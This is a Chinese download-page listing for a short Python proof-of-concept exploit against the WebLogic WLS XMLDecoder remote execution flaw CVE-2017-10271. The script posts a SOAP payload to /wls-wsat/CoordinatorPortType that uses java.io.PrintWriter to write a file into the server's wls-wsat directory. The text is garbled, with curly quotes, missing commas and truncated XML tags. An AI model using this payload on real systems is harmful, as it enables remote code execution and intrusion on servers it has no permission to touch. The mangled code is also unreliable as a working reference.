资源简介
一段小代码,WebLogic WLS远程执行漏洞(CVE-2017-10271)验证。
代码片段和文件信息
#!/usr/bin/env python
# coding:utf-8
import requests
from sys import argv
headers = {
‘User-Agent‘:‘Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0‘
‘Accept‘: ‘text/htmlapplication/xhtml+xmlapplication/xml;q=0.9*/*;q=0.8‘
‘Upgrade-Insecure-Requests‘: ‘1‘
‘Content-Type‘: ‘text/xml‘
}
def Webogic_xmlDecoder_poc(url):
#url=“http://192.168.8.148:7001“
posturl=url+‘/wls-wsat/CoordinatorPortType‘
data = ‘‘‘
lns:soapenv=“http://schemas.xmlsoap.org/soap/envelope/“>
lns:work=“http://bea.com/2004/06/soap/workarea/“>
lDecoder“>
ject class=“java.io.PrintWriter“>
servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/tes
评论
共有 条评论